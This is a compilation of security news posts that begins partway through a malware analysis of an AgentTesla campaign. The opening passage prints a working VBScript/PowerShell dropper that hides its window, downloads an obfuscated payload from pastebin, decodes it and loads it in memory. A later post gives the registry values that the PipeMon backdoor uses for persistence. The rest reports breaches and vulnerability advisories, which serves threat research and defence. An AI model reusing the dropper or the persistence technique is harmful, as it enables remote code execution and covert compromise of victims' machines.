<script language=”&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;”>Const HIDDEN_WINDOW = 0strComputer = “.”Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)Set objStartup = objWMIService.Get(“Win32_ProcessStartup”)Set objConfig = objStartup.SpawnInstance_objConfig.ShowWindow = HIDDEN_WINDOWSet objProcess = GetObject(“winmgmts:root\cimv2:Win32_Process”)errReturn = objProcess.Create( “powershell.exe -nologo -WindowStyle Hidden $_Xpin = ((New-Object Net.WebClient).DowNloAdSTRiNg(‘h’+’t’+’t’+’p’+’s’+’:’+’/’+’/’+’p’+’a’+’s’+’t’+’e’+’b’+’i’+’n’+’.’+’c’+’o’+’m’+’/’+’r’+’a’+’w’+’/eyGv9x4B’));$_Xpin=$_Xpin.replace(‘.’,’*!(@*#(!@#*’).replace(‘*!(@*#(!@#*’,’0′);$_Xpin = $_Xpin.ToCharArray();[Array]::Reverse($_Xpin);[byte[]]$_PMP = [System.Convert]::FromBase64String($_Xpin);$_1 = [System.Threading.Thread]::GetDomain().Load($_PMP);$_1.EntryPoint.invoke($S,$X)”, null, objConfig, intProcessID)
self.close
</script>

Code Snippet 9

This component spawn through powershell a script a binary file from a pastebin, eyGv9x4B, but, unfortunately, at the time of analysis, the paste has been removed.

This example could suggest to us the power of the malicious infrastructure built from the attacker, where  components could be removed or replaced with another one in every moment.

The Payload

As previously stated, the final payload is AgentTesla. It remains one of the most adopted commodity malware instructed to steal a large number of sensitive information about the victim. During the past years, we constantly studied the evolution of this threat and we enumerated all the sensitive data grasped by it. 

However, also in this case, we obtained the final payload and the configuration of the SMTP client where sends the stolen information:

Figure 13: Configuration of the AgentTesla SMTP client

The domain “atn-com.pw” has been created ad-hoc in order to manage the infection campaign. Studying the uptime of the domain we were able to reconstruct the infection campaign of the threat actor.


Figure 14: Information about the C2 uptime stats

As shown above, the domain has been registered on the last days of january and it has been active since the middle of April. After a short period of inactivity, it compared another time the 2nd of May since these days.

Conclusion

The actor hiding behind this campaign can undoubtedly be considered a persistent cyber-threat to many organizations operating in production sectors in Europe and, in the last months, also in Italy. Its intricate infection chain developed and tested during the years gave him the flexibility needed to bypass many layers of traditional security defences, manipulating the delivery infrastructure from time to time.

During the time, the actor’s delivery infrastructure was leveraged to install different kinds of malware: most of the time remote access trojans and info and credential stealing software. Such malware types are capable of enabling cyber-espionage and IP theft operations, potentially to re-sell stolen information on dark markets.

No doubt, we will keep going to track this threat.

Additional details, including IoCs and Yara rules are available here:

Pierluigi Paganini

(SecurityAffairs – Italian manufacturing, hacking)

The post Cyber-Criminal espionage Operation insists on Italian Manufacturing appeared first on Security Affairs.

Winnti uses a new PipeMon backdoor in attacks aimed at the gaming industry

The Winnti hacking group continues to target gaming industry, recently it used a new malware named PipeMon and a new method to achieve persistence.

Winnti hacking group is using a new malware dubbed PipeMon and a novel method to achieve persistence in attacks aimed at video game companies.

The Winnti group was first spotted by Kaspersky in 2013, but according to the researchers the gang has been active since 2007.

The experts believe that under the Winnti umbrella there are several APT groups, including  Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, BARIUM, LEADPassCV, Wicked Panda, Group 72, Blackfly, and APT41, and ShadowPad.

The APT group targeted organizations in various industries, including the aviation, gaming, pharmaceuticals, technology, telecoms, and software development industries.

PipeMon is a modular backdoor that was spotted by ESET researchers earlier this year on servers belonging to several developers of massively multiplayer online (MMO) games from South Korea and Taiwan. Each component of the backdoor is implemented by a DLL.

“In February 2020, we discovered a new, modular backdoor, which we named PipeMon. Persisting as a Print Processor, it was used by the Winnti Group against several video gaming companies that are based in South Korea and Taiwan and develop MMO (Massively Multiplayer Online) games.” reads the report published by the company. “Video games developed by these companies are available on popular gaming platforms and have thousands of simultaneous players.”

winnti backdoor gaming

In one case analyzed by the researchers, the hackers compromised a victim’s build system, then they have planted malware inside the video game executable. In another case, the Winnti group compromised the game servers were compromised, which could have allowed the attackers to conduct several malicious actions, including the manipulation of in-game currencies for financial gain.

Experts noticed that the PipeMon backdoor was signed with a certificate belonging to a video game company that was already hacked by Winnti in 2018.

Researchers also reported that the threat actors reused some C2 domains involved in other campaigns and used a custom login stealer that was previously associated with Winnti operations.

The experts discovered two PipeMon variants, but they were able to describe the infection process and how it has achieved persistence only for one of them.

The first stage of the PipeMon backdoor consists of a password-protected RARSFX executable embedded in the .rsrc section of its launcher.

The hackers achieved persistence by using the Windows print processors (DLLs). A malicious DLL‌ loader drops where the print processors reside and registered as an alternative print processor by modifying one of the two registry values:

HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\PrintFiiterPipelineSvc\Driver = “DEment.dll”
 
HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\lltdsvc1\Driver = “EntAppsvc.dll”

After having registered the Print Processor, PipeMon restarts the print spooler service (spoolsv.exe) to load the malware.

Since the service starts every time the computer reboot, the attackers have achieved persistence.

“After having registered the Print Processor, PipeMon restarts the print spooler service (spoolsv.exe). As a result, the malicious print process is loaded when the spooler service starts. Note that the Print Spooler service starts at each PC startup, which ensures persistence across system resets.” continues the report.

“This technique is really similar to the Print Monitor persistence technique (being used by DePriMon, for example) and, to our knowledge, has not been documented previously.”

PipeMon modules are DLLs exporting a function called IntelLoader and are loaded using a reflective loading technique.

The loader, responsible for loading the main modules (ManagerMain and GuardClient) is Win32CmdDll.dll and is stored in the Print Processors directory. Experts noticed that modules are stored encrypted on disk at the same location with inoffensive-looking names.

Experts also spotted an updated version of PipeMon for which they were able to retrieve the first stage. Its architecture is highly similar to the original variant, but its code was rewritten from scratch.

“Once again, the Winnti Group has targeted video game developers in Asia with a new modular backdoor signed with a code-signing certificate likely stolen during a previous campaign and sharing some similarities with the PortReuse backdoor. This new implant shows that the Winnti Group is still actively developing new tools using multiple open source projects; they don’t rely solely on their flagship backdoors, ShadowPad and the Winnti malware.” concludes ESET.

Pierluigi Paganini

(SecurityAffairs – Winnti, hacking)

The post Winnti uses a new PipeMon backdoor in attacks aimed at the gaming industry appeared first on Security Affairs.

Santander, one of the biggest European banks, was leaking sensitive data on their website

Santander Consumer Bank, the Belgian branch of the bank, had a misconfiguration in its blog domain that was allowing its files to be indexed.

Our new research recently discovered a security issue with Santander, the 5th largest bank in Europe and the 16th largest in the world. This Spanish multinational bank controls approximately $1.4 trillion in total assets globally, and has a $69.9 billion total market capitalization on the Euro Stoxx 50 stock market index.

Our analysts found that the Belgian branch, Santander Consumer Bank, has a misconfiguration in its blog domain, allowing its files to be indexed. 

When we looked through these files, we were able to see sensitive information, including an SQL dump and JSON file that can be used by hackers to potentially phish Santander’s bank customers.

We contacted Santander immediately when we discovered the misconfiguration on April 15.  Representatives from the leading European bank responded to our emails and seem to have fixed the issue, as we are presently unable to access the information.

A Santander Consumer spokesperson said:

“The incident highlighted relates specifically to the Santander Consumer Bank Belgium blog only. The blog contains only public information and articles, and therefore no customer data or critical information from the blog  has been compromised. Our security team has already fixed the issue to ensure the blog is secure.”

What exactly is wrong with the Santander website?

When we visited the Santander blog on its Belgian domain, we noticed that the www endpoint of the blog subdomain had a misconfiguration that allowed all of its files to be indexed by search engines

Included in these indexed files was an important info.json file that seemed to contain its Cloudfront API keys.

Cloudfront is a Content Display Network (CDN) created by Amazon. Websites use CDNs to host large files, such as videos, PDFs, large images and other static content, that would normally slow down their own websites. Because these large files are hosted on the CDNs instead, websites are faster for users.

If a hacker were to get a hold of Santander’s apparent Cloudfront API keys, they would be able to switch out the content hosted on Cloudfront with any other content

For example, if a PDF or Word document was hosted on Cloudfront, and this document contained sensitive information – such as what accounts a customer should send money to – then the hacker would be able to switch that document out with their own version. In that way, they’d be able to change the real account number to his own, and thereby steal the customer’s money.

If a static HTML file was hosted, then the hacker would be able to switch that out with an entire webpage, allowing them to create a phishing page to steal the user’s financial information, all while on Santander’s official Belgian domain.

How to protect yourself

On April 15, we notified Santander’s Belgian website of the misconfiguration, and on April 24 they responded and seem to have fixed the issue. Their CyberSecurity Team stated: “We take cyber security seriously and strive to maintain the highest security standards and best practices and welcome responsible disclosure attitudes in security researchers.”

When we checked for the misconfiguration again on April 27, we received the following message:

Forbidden

You don’t have permission to access this resource.

For Santander’s customers, as well as all other banking customers, we’d recommend that you always check the domain and subdomain that a suspicious bank email is sending you to. Make sure that the domain is the bank’s real domain, but also know that important financial information requests would never be hosted on the blog subdomain of a bank.

Editor’s note: this article was updated on May 19 to reflect new information in collaboration with BitSight that the keys may not have been active Cloudfront API keys at the time of our discovery.

Original post:

https://cybernews.com/security/one-of-biggest-european-banks-leaking-sensitive-data-on-website/

About the author: Bernard Meyer

Bernard Meyer is the Senior Researcher at CyberNews. He has a strong passion for security in popular software, maximizing privacy online, and keeping an eye on governments and corporations. He’s been featured in Fortune, Forbes, Wired, Mirror, TechRadar and more. You can usually find him on Twitter arguing with someone about something moderately important.

Pierluigi Paganini

(SecurityAffairs – Santander, hacking)

The post Santander, one of the biggest European banks, was leaking sensitive data on their website appeared first on Security Affairs.

Meal delivery service Home Chef discloses data breach

Meal delivery service Home Chef has confirmed that it recently suffered a security breach that exposed its customer information.

Meal delivery service Home Chef has disclosed a data breach that exposed its customer information. Home Chef also explained that only a portion ot its customers were impacted in the security incident.

In early May, Shiny Hunters hacking group started offering for sale the databases containing tens of millions from user records from over 11 companies.

Below the complete list published by BleepingComputer:

CompanyUser RecordsPrice
Tokopedia91 million$5,000
Home Chef8 million$2,500
Bhinneka1.2 million$1,200
Minted5 million$2,500
Styleshare6 million$2,700
Ggumim2 million$1,300
Mindful2 million$1,300
StarTribune1 million$1,100
ChatBooks15 million$3,500
The Chronicle Of Higher Education3 million$1,500
Zoosk30 million$500

At the time, the Shiny Hunters were offering more than 8 million records for $2500.

Now the company confirmed the data breach, saying that the incident has impacted select customer information.

Exposed data includes email addresses, names, phone numbers, hashed passwords, and the last four digits of credit card numbers.

“Was My Credit Card Information Compromised? Home Chef does not store complete credit or debit card information” reads the FAQ published by the company.

“Information such as frequency of deliveries and mailing address may also have been compromised,”.

Home Chef also underlined the fact that it does not store complete credit or debit card information. The company is investigating the incident and announced that it is taking action to strengthen its security defenses and prevent similar incidents in the future.

Although the company stores passwords in encrypted format, it recommends users to change the password in an abundance of caution following these process:

  1. Visit www.homechef.com
  2. Click on “Log in”
  3. Click on “Account Information”, which is located under the “Account” dropdown menu
  4. Complete the “Change Your Password” section and click “Save your settings.” There’s no need to adjust the other sections on the Account page (e.g. “Subscription”)

Home Chef users should remain vigilant against phishing attacks and suspicious activity in their accounts.

The company is notifying the incident to the impacted users.

Pierluigi Paganini

(SecurityAffairs – HomeChef, hacking)

The post Meal delivery service Home Chef discloses data breach appeared first on Security Affairs.

Iran-linked Chafer APT group targets governments in Kuwait and Saudi Arabia

Cybersecurity researchers uncovered an Iranian cyber espionage campaign conducted by Chafer APT and aimed at critical infrastructures in Kuwait and Saudi Arabia.

Cybersecurity researchers from Bitdefender published a detailed report on an Iranian cyber espionage campaign directed against critical infrastructures in Kuwait and Saudi Arabia.

The cyber espionage campaigns were carried out by Iran-linked Chafer APT (also known as APT39 or Remix Kitten).

The Chafer APT group has distributed data stealer malware since at least mid-2014, it was focused on surveillance operations and the tracking of individuals.

The APT group targets telecommunication and travel industries in the Middle East to gather intelligence on Iran’s geopolitical interests.

“Victims of the analyzed campaigns fit into the pattern preferred by this actor, such as air transport and government sectors in the Middle East,” reads the researcher paper published by the experts.

“Some traces indicate that the goal of the attack was data exploration and exfiltration (on some of the victim’s tools such as Navicat, Winscp, found in an unusual location, namely “%WINDOWS%\ime\en-us-ime”, or
SmartFtpPasswordDecryptor were present on their systems).”

The attackers used several tools, including ‘living off the land’ tools, making it hard to attribute the attack to specific threat actors, as well as a custom-built backdoor.

The attacks against entities in Kuwait and Saudi Arabia have multiple similarities and shares some common stages, but experts noticed that the attacks seem more focused and sophisticated on victims from Kuwait.

Chafer APT launched spear-phishing attacks, the messages were used to deliver multiple backdoors that allowed them to gain a foothold, elevate their privileges, conduct internal reconnaissance, and establish persistence in the victim environment.

“Once the victims were compromised, attackers started to bring reconnaissance tools for network scanning (“xnet.exe”, “shareo.exe”) and credential gathering (as “mnl.exe” or “mimi32.exe”) or tools with multiple functionalities, such as CrackMapExec (for users’ enumeration, share listing, credentials harvesting and so on).” continues the report.

“During our investigation, on some of the compromised stations we observed some unusual behavior performed under a certain user account, leading us to believe the attackers managed to create a user account on the victims’ machine and performed several malicious actions inside the network, using that account.”

The attacks against entities in Kuwait appeared more sophisticated, attackers were creating a user account on the compromised machines and performed malicious actions inside the network, including credential harvesting with Mimikatz and lateral movements using multiple hacking tools from their arsenal.

Most of the hacking activity occurs on Friday and Saturday, coinciding with the weekend in the Middle East.

The campaign against a Saudi Arabian entity was characterized by the large use of social engineering attacks to trick the victim into executing a remote administration tool (RAT), The RAT employed in the attacks shares similarities with those used against Kuwait and Turkey.

“The case investigated in Saudi Arabia was not as elaborate, either because the attackers did not manage to further exploit the victim, or because the reconnaissance revealed no information of interest.” continues the report.

“While this attack was not as extensive as the one in Kuwait, some forensic evidence suggests that the same attackers might have orchestrated it. Despite the evidence for network discovery, we were not able to find any traces for lateral movement, most probably because threat actors were not able to find any vulnerable machines.”

The campaigns against Kuwait and Saudi Arabia demonstrate the intense cyberespionage activity carried out by Iran-linked APT groups in the Middle East. Anyway we cannot underestimate that these hacking groups are extending their range of action targeting government and organizations worldwide.

Pierluigi Paganini

(SecurityAffairs – Chafer APT, hacking)

The post Iran-linked Chafer APT group targets governments in Kuwait and Saudi Arabia appeared first on Security Affairs.

VMware fixes CVE-2020-3956 Remote Code Execution issue in Cloud Director

VMware has addressed a high-severity remote code execution vulnerability, tracked as CVE-2020-3956, that affects its Cloud Director product.

VMware has patched a high-severity remote code execution vulnerability, tracked as CVE-2020-3956, in its Cloud Director product.

The vulnerability is a code injection issue that could be exploited by an authenticated attacker to send malicious traffic to Cloud Director, which could allow executing arbitrary code.

“A code injection vulnerability in VMware Cloud Director was privately reported to VMware. Patches and workarounds are available to remediate or workaround this vulnerability in affected VMware products.” reads the security advisory published by VMware.

“An authenticated actor may be able to send malicious traffic to VMware Cloud Director which may lead to arbitrary remote code execution. This vulnerability can be exploited through the HTML5- and Flex-based UIs, the API Explorer interface and API access.”

According to the company, the vulnerability can be exploited through the HTML5- and Flex-based UIs, the API Explorer interface and API access.

The vulnerability impacts VMware Cloud Director 10.0.x, 9.7.x and 9.5.x on Linux and Photon OS appliances, and version 9.1.x on Linux. Versions 8.x, 9.0.x and 10.1.0 are not affected.

VMware vCloud Director 9.1.0.4, 9.5.0.6, 9.7.0.5 and 10.0.0.2 addresses the issue. VMware has also released a workaround to mitigate the risk of attacks exploiting the issue.

The vulnerability was discovered by Tomáš Melicher and Lukáš Václavík of Citadelo.

A couple of weeks ago, VMware addressed vulnerabilities impacting the vRealize Operations Manager (vROps) product, including two recently disclosed Salt issues.

Earlier this month, VMware has addressed a critical information disclosure flaw, tracked as CVE-2020-3952, that could be exploited by attackers to compromise vCenter Server or other services that use the Directory Service (vmdir) for authentication.

The CVE-2020-3952 vulnerability has received a CVSSv3 score of 10, it resides in the vCenter Server version 6.7 on Windows and virtual appliances.

Pierluigi Paganini

(SecurityAffairs – CVE-2020-3956, hacking)

The post VMware fixes CVE-2020-3956 Remote Code Execution issue in Cloud Director appeared first on Security Affairs.

Adobe fixed several memory corruption issues in some of its products

Adobe addressed multiple memory corruption vulnerabilities, including one that allows arbitrary code execution, in several of its products.

Adobe addressed multiple memory corruption vulnerabilities in several of its products, including an arbitrary code execution.

The issues affect Character Animation, Premiere Rush, Premiere Pro, and Audition, they were reported to Adobe by researcher Mat Powell of Trend Micro’s Zero Day Initiative (ZDI).

APSB20-29 Security update available for Adobe Premiere Rush05/19/202005/19/2020
APSB20-28 Security update available for Adobe Audition05/19/202005/19/2020
APSB20-27 Security update available for Adobe Premiere Pro05/19/202005/19/2020
APSB20-25 Security update available for Adobe Character Animator 05/19/202005/19/2020

The most serious flaw, tracked as CVE-2020-9586, is a critical stack-based buffer overflow affecting the Windows and macOS versions of the Adobe’s Character Animation product.

The vulnerability could be exploited by a remote attacker to execute arbitrary code.

“Adobe has released an update for Adobe Character Animator for Windows and macOS. This update resolves a stack-based buffer overflow vulnerability that could lead to remote code execution.” reads the advisory published by Adobe.

Adobe has also addressed updates an out-of-bounds read vulnerability in Adobe Premiere Rush for Windows and macOS that could lead to information disclosure. 

The IT giant has released security updates for Adobe Premiere Pro for Windows and macOS that addressed an out-of-bounds read vulnerability that could lead to information disclosure.

The last issue addressed by Adobe is a stack-based buffer overflow vulnerability in Adobe Character Animator for Windows and macOS that could lead to remote code execution. 

The good news is that Adobe is not aware of attacks in the wild that exploited the above vulnerabilities and assigned them a priority rating of 3 because they are unlikely to ever be exploited.

At the beginning of this month Adobe released security updates to address 36 vulnerabilities in Adobe Acrobat, Reader, and Adobe DNG Software Development Kit.

Pierluigi Paganini

(SecurityAffairs – memory corruption flaws, hacking)

The post Adobe fixed several memory corruption issues in some of its products appeared first on Security Affairs.

Israel is suspected to be behind the cyberattack on Iranian port

Israel is likely behind the recent cyberattack which disrupted some operations at Iran’s Shahid Rajaei Port, located near the Strait of Hormuz.

A couple of weeks ago, Iranian officials announced that hackers damaged a small number of systems at the port of Shahid Rajaei in the city of Bandar Abbas.

Bandar Abbas is the capital of Hormozgān Province on the southern coast of Iran, on the Persian Gulf. The city occupies a strategic position on the narrow Strait of Hormuz, and it is the location of the main base of the Iranian Navy. Bandar Abbas is also the capital and largest city of Bandar Abbas County.

Iranian officials did not reveal details of the cyber attack that took place on May 9, two days before Iranian officials disclosed the incident.

Local authorities, including the Ports and Maritime Organization (PMO) in the state of Hormozgan, confirmed that operations at the port were impacted by the cyber attack.

Initially, officials denied the cyber-attack, but due to media pressure that later admitted the cyber intrusion.

The authorities did not attribute the attack to a specific threat actor, Iran’s Deputy Minister of Roads and Urban Development stated that he did not have any information about the origin of the attack.

“Currently, the distribution of cargo in northern ports is good; although the performance of all southern ports is negative.” Mohammad Rastad.

Rastad told Fars News Agency that the attack was carried out by a foreign governenment.

Now a foreign government security official said the attack was “highly accurate” and the damages caused to the Iranian infrastructure were greater than described in official Iranian accounts.

The news was reported by The Washington Post, which blamed Israel for the cyber attack that was launched in retaliation for an earlier cyberattack on rural water distribution systems in Israel.

In April, the Israeli government has issued an alert to organizations in the water sector following a series of cyberattacks that targeted the water facilities.

Earlier May, Israel’s security cabinet discussed alleged Iranian cyberattack on Israeli water and sewage facilities that fortunately did not cause serious damage. The attack demonstrates an escalation by the Iranians, because they targeted civilian infrastructure.

“This was a very unordinary cyberattack against civilian water facilities which is against every ethic and every code even in times of war,” a senior Israeli official told Channel 13. “We didn’t expect this even from the Iranians. It is just not done.”Iran reported three cyberattacks within one week back in December. At least one of the attacks was allegedly “state-sponsored.”

Israel’s National Cyber Directorate announced to have received reports of cyber attacks aimed at supervisory control and data acquisition (SCADA) systems at wastewater treatment plants, pumping stations and sewage facilities.

The recent attack could be a response of the Israeli cyber army against the wave of attacks that targeted Israely water sector.

“Israel appears to be behind a cyberattack earlier this month on computers at Iran’s Shahid Rajaee port that caused massive backups on waterways and roads leading to the facility, the Washington Post reported on Monday.” reads the report published by the Reuters.

“Citing unnamed U.S. and foreign government officials, the Post said the May 9 disruption of Iranian computers was presumably in retaliation for an earlier attempted cyberattack on rural water distribution systems in Israel.”

The Reuters agency contacted the Israeli Embassy in Washington for a comment by it has yet to respond.

In December 2019, Iran foiled two massive cyber-attacks in less than a week, the country’s telecommunications minister Mohammad Javad Azari-Jahromi revealed.

The news was reported by both the ISNA and Mehr news agencies, the Iranian minister defined the attacks as “really massive” and attributed them to a nation-state actor.

Pierluigi Paganini

(SecurityAffairs – Iran, hacking)

The post Israel is suspected to be behind the cyberattack on Iranian port appeared first on Security Affairs.

Researchers disclose five Microsoft Windows zero-days

Security experts have disclosed five unpatched vulnerabilities in Microsoft Windows, four of which rated as high-risk severity.

Security experts from Trend Micro’s Zero Day Initiative (ZDI) have published information on five unpatched vulnerabilities in Microsoft Windows.

Four vulnerabilities are classified as high-risk severity, three of them are zero-day vulnerabilities tracked as CVE-2020-0916, CVE-2020-0986, and CVE-2020-0915. The flaws could allow an attacker to escalate privileges on the affected system, they received a CVSS score of 7.0.

The vulnerabilities affect in the user-mode printer driver host process splwow64.exe, and is caused by the lack of validation for user-supplied input being dereferenced as a pointer. 

The fourth issue affecting the user-mode printer driver host process splwow64.exe, tracked as CVE-2020-0915, is a low severity information disclosure vulnerability.

The issue is caused by the lack of validation of a user-supplied value before being dereferenced as a pointer.

ZDI reported the issue to Microsoft in December 2019, but the tech giant failed to address them with May 2020 Patch Tuesday.

The last zero-day vulnerability disclosed by Trend Micro’s Zero Day Initiative (ZDI) is a privilege escalation vulnerability in the handling of WLAN connection profiles.  

“This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.” reads the advisory published by Trend Micro.

“The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute code in the context of the current user at medium integrity.”

Pierluigi Paganini

(SecurityAffairs – Microsoft Windows, hacking)

The post Researchers disclose five Microsoft Windows zero-days appeared first on Security Affairs.

Three flaws in Nitro Pro PDF reader expose businesses to hack

Two vulnerabilities in the Nitro Pro PDF editor could be exploited by threat actors to execute code remotely on vulnerable hosts.

Security experts from Cisco Talos have discovered three vulnerabilities in the Nitro Pro PDF editor, two of which rated as critical (CVSS score of 8.8) could be exploited by attackers for remote code execution.

Nitro Pro is a PDF application designed for creating, reading, editing, signing, converting, and protecting PDFs. The software is part of Nitro Software’s suite of enterprise tools, used by tens of thousands of organizations.

nitro pro Nitro

The first issue, tracked as CVE-2020-6074, is a nested pages remote code execution vulnerability that resides the PDF parser of Nitro Pro. An attacker could exploit the vulnerability by tricking the victims into opening a specially crafted PDF to trigger a use-after-free condition.

“An exploitable code execution vulnerability exists in the PDF parser of Nitro Pro 13.9.1.155. A specially crafted PDF document can cause a use-after-free which can lead to remote code execution. An attacker can provide a malicious file to trigger this vulnerability.” reads the advisory published by the company.

The second vulnerability, tracked as CVE-2020-6092, is an object code execution vulnerability that resides in the way Nitro Pro 13.9.1.155 parses Pattern objects. An attacker could exploit the flaw by tricking the victims into opening a specially crafted PDF and trigger an integer overflow and then achieve remote code execution.

“An exploitable code execution vulnerability exists in the way Nitro Pro 13.9.1.155 parses Pattern objects. A specially crafted PDF file can trigger an integer overflow that can lead to arbitrary code execution. A victim must open a malicious file to trigger this vulnerability” continues the advisory.

The third flaw is a Javascript XML error handling information disclosure vulnerability, tracked as CVE-2020-6093.

The information disclosure vulnerability exists in the way the version 13.9.1.155 handles XML errors,e it could be exploited by an attacker by tricking the victims into opening a specially crafted PDF document that can cause uninitialized memory access and consequent information disclosure.

Cisco security researchers also identified an information disclosure vulnerability in the application. Tracked as CVE-2020-6093 and carrying a CVSS score of 6.5, the bug is related to the way Nitro Pro does XML error handling.

In early May, the software vendor released a security update that address the above vulnerabilities.

Pierluigi Paganini

(SecurityAffairs – PDF, hacking)

The post Three flaws in Nitro Pro PDF reader expose businesses to hack appeared first on Security Affairs.

Bluetooth BIAS attack threatens billions of devices

Boffins disclosed a security flaw in Bluetooth, dubbed BIAS, that could potentially be exploited by an attacker to spoof a remotely paired device.

Researchers from École Polytechnique Fédérale de Lausanne (EPFL) discovered a vulnerability in Bluetooth, dubbed Bluetooth Impersonation AttackS or BIAS, that could potentially be exploited by an attacker to spoof a remotely paired device.

The issue potentially impact over a billion of devices.

“To establish an encrypted connection, two Bluetooth devices must pair with each other using a link key. It is possible for an unauthenticated, adjacent attacker to impersonate a previously paired/bonded device and successfully authenticate without knowing the link key. This could allow an attacker to gain full access to the paired device by performing a Bluetooth Impersonation Attack (BIAS).” reads the vulnerability note VU#647177.

The Bluetooth specification is affected by security flaws that could allow attackers to carry out impersonation attacks while establishing a secure connection.

For BIAS attack to be successful, the attacker has to use a device that would need to be within wireless range of a vulnerable Bluetooth device that has previously established a BR/EDR bonding with a remote device with a Bluetooth address known to the attacker.

To establish an encrypted connection, two Bluetooth devices must pair with each other using a link key, aka long term key.

The experts explained that the flaw results from how two previously paired devices handle the link key. The link key allows two paired devices to maintain the connection every time a data is transferred between the two devices.

The experts discovered that it is possible for an unauthenticated attacker within the wireless range of a target Bluetooth device to spoof the address of a previously paired remote device to successfully complete the authentication procedure with some paired/bonded devices without knowing the link key.

“The Bluetooth standard includes a legacy authentication procedure and a secure authentication procedure, allowing devices to authenticate to each other using a long term key. Those procedures are used during pairing and secure connection establishment to prevent impersonation attacks. In this paper, we show that the Bluetooth specification contains vulnerabilities enabling to perform impersonation attacks during secure connection establishment.” reads the research paper. “Such vulnerabilities include the lack of mandatory mutual authentication, overly permissive role switching, and an authentication procedure downgrade.”

The researchers reported their findings to the Bluetooth Special Interest Group (SIG), in December 2019.

“The researchers identified that it is possible for an attacking device spoofing the address of a previously bonded remote device to successfully complete the authentication procedure with some paired/bonded devices while not possessing the link key. This may permit an attacker to negotiate a reduced encryption key strength with a device that is still vulnerable to the Key Negotiation of Bluetooth attack disclosed in 2019.” reads the advisory published by the Bluetooth SIG. “If the encryption key length reduction is successful, an attacker may be able to brute force the encryption key and spoof the remote paired device. If the encryption key length reduction is unsuccessful, the attacker will not be able to establish an encrypted link but may still appear authenticated to the host.”

Experts explained that combining the BIAS attack with other attacks, such as the KNOB (Key Negotiation of Bluetooth) attack, the attacker van brute-force the encryption key and use it to decrypt communications.

“The BIAS and KNOB attacks can be chained to impersonate a Bluetooth device, complete authentication without possessing the link key, negotiate a session key with low entropy, establish a secure connection, and brute force the session key” states the paper.

Experts tested the attack against as many as 30 Bluetooth devices and discovered that all of them were found to be vulnerable to BIAS attacks.

The Bluetooth SIG has addressed the vulnerability announcing the introduction of changes into a future specification revision.

The SIG recommends Bluetooth users to install the latest updates from the device and operating system manufacturers.

“The BIAS attacks are the first uncovering issues related to Bluetooth’s secure connection establishment authentication procedures, adversarial role switches, and Secure Connections downgrades,” the paper concludes. “The BIAS attacks are stealthy, as Bluetooth secure connection establishment does not require user interaction.”

Pierluigi Paganini

(SecurityAffairs – BIAS attack, hacking)

The post Bluetooth BIAS attack threatens billions of devices appeared first on Security Affairs.

Easyjet hacked: 9 million customer’s data exposed along with 2,200+ credit card details

British airline EasyJet announced it was the victim of a “highly sophisticated” cyber attack that exposed email addresses and travel details of around 9 million of its customers.

British airline EasyJet announced that a “highly sophisticated” cyber-attack exposed email addresses and travel details of around 9 million of its customers.

“Following discussions with the Information Commissioner’s Office (“ICO”), the Board of easyJet announces that it has been the target of an attack from a highly sophisticated source.” reads a statement from the company. “Our investigation found that the email address and travel details of approximately 9 million customers were accessed.” 

According to the company, hackers also accessed a small subset of customers and obtained credit card details for 2,208 of them, no passport details were exposed.

“Our forensic investigation found that, for a very small subset of customers (2,208), credit card details were accessed.” continues the company.

At the time of writing the airline did not disclose details of the security breach, it is not clear when the incident took place and how EasyJet discovered the intrusion.


EasyJet conducted a forensic investigation and once identifies the unauthorized access has locked it.

The airline reported the incident to the Information Commissioner’s Office (“ICO”), the good news is that the company is not aware of any attack in the wild that abused the stolen information.

EasyJet is still investigating the security breach.

“We take the cybersecurity of our systems very seriously and have robust security measures in place to protect our customers’ personal information. However, this is an evolving threat as cyber attackers get ever more sophisticated,” says EasyJet Chief Executive Officer Johan Lundgren.

“Since we became aware of the incident, it has become clear that owing to COVID-19, there is heightened concern about personal data being used for online scams. Every business must continue to stay agile to stay ahead of the threat.”

The airline has started notifying the incident to all the impacted customers and is recommending them to be “extra vigilant, particularly if they receive unsolicited communications.”

According to the Reuters that cited two people familiar with the investigation, hacking tools and techniques used by attackers point to a group of suspected Chinese hackers that targeted multiple airlines in recent months.

Pierluigi Paganini

(SecurityAffairs – EasyJet, hacking)

The post Easyjet hacked: 9 million customer’s data exposed along with 2,200+ credit card details appeared first on Security Affairs.

Hackers Target Oil Producers During COVID-19 Slump

Recent research shows that the oil industry — already experiencing difficulties due to COVID-19 — must remain abreast of threats to stay safe from hackers.

Spear-phishing is a rapidly emerging threat. It’s more specific than generic phishing attempts and often targets a single person or company. Recent research shows that the oil industry — already experiencing difficulties due to COVID-19 — must remain abreast of threats to stay safe from hackers. 

Cybercriminals Capitalizing on the Chaos

The coronavirus is forcing companies in most industries to operate substantially differently. Many may find it takes time to adjust to the changes. Others do not immediately have the resources for a major shift, such as having all employees work remotely. 

A related concern is that COVID-19 is both a new and anxiety-inducing issue. People want to learn as much as they can about it, and their haste may result in them clicking on links without thinking. Cybercriminals view these conditions as ideal for orchestrating their attacks. Data from Barracuda cybersecurity researchers identified a 667% increase in spear-phishing attacks between the end of February and the following month. 

Real-Life Examples of Spear-Phishing Attacks in the Energy Production Sector

The threat of spear-phishing for energy companies is, unfortunately, not a theoretical one. Coverage published in late April by Bitdefender illuminated a carefully executed attack. The research team found evidence of a campaign occurring March 31, whereby hackers impersonated a well-known engineering company with experience in on- and off-shore energy projects. 

The messages — which did not include many of the telltale signs of phishing like spelling and grammatical errors — asked recipients to submit equipment and materials bids for the Rosetta Sharing Facilities Project. Participants would do so on behalf of Burullus, a gas joint venture partially owned by another Egyptian state oil brand. 

The emails also contained two attachments, which were supposedly bid-related forms. Downloading them infected a user’s system with a type of trojan spyware not previously seen in other utilities industry cyberattacks. The effort targeted oil companies all over the world, from Malaysia to South Africa, in a single day. 

